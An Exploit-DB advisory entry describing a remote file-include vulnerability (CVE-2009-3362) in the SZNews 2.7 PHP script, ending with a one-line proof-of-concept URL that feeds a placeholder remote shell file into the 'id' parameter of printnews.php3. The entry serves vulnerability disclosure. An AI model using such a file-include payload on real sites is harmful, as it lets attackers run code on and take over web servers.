SZNews 2.7 - 'printnews.php3' Remote File Include Vulnerability

2009-09-11T00:00:00
ID EDB-ID:34598
Type exploitdb
Reporter kurdish hackers team
Modified 2009-09-11T00:00:00

Description

SZNews 2.7 'printnews.php3' Remote File Include Vulnerability. CVE-2009-3362. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/42974/info

SZNews is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

SZNews 2.7 is vulnerable; other versions may also be affected. 

http://www.example.com/path/printnews.php3?id=[shell.txt?]